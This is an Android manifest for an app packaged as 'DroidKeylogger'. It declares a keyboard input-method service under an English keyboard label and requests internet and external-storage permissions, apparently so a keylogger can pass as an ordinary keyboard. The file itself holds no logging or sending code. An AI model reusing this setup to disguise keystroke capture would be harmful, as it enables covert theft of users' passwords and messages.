<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.DroidKeylogger.main">

    <uses-permission android:name="android.permission.VIBRATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>

    <application
        android:allowBackup="true"
        android:icon="@mipmap/loki_board"
        android:label="@string/english_ime_name"
        android:supportsRtl="true">
        <!-- Services -->
        <service
            android:name="com.DroidKeylogger.main.latin.LatinIME"
            android:label="@string/english_ime_name"
            android:permission="android.permission.BIND_INPUT_METHOD">
            <intent-filter>
                <action android:name="android.view.InputMethod" />
            </intent-filter>

            <meta-data
                android:name="android.view.im"
                android:resource="@xml/method" />
        </service>

        <activity
            android:name="com.DroidKeylogger.main.latin.settings.SettingsActivity"
            android:label="@string/english_ime_name"
            android:theme="@style/platformSettingsTheme">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity> <!-- Broadcast receivers -->
        <receiver android:name="com.DroidKeylogger.main.latin.SystemBroadcastReceiver">
            <intent-filter>
                <action android:name="android.intent.action.LOCALE_CHANGED" />
            </intent-filter>
        </receiver>
    </application>

</manifest>